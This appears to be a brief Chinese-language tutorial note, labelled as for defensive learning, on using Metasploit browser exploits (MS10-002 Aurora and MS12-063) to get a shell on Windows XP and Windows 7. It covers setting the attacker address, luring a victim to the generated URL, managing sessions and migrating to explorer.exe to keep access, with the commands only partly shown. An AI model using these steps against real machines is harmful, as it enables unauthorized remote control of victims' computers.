【笔记】msf通过浏览器获取shell
前言
msf通过浏览器获取Windows系统shell
本文仅用于网络信息防御学习
msf通过浏览器获取shell
- ms10002:winxp的getshell漏洞
- ms12063:win7的getshell漏洞
<ip_local>
:配置攻击者地址
1 | msf > use exploit/windows/browser/ms10_002_aurora |
- 执行攻击后,会得到一个网址,当受害者访问这个网址后,即可获取shell
1
:会话编号
1 | 查看所有会话 |
- 由于受害者关闭浏览器进程后,会话会失效,所以可以移动会话绑定的进程,推荐绑定explorer.exe进程
<pid>
:进程的pid
1 | 使用一个会话 |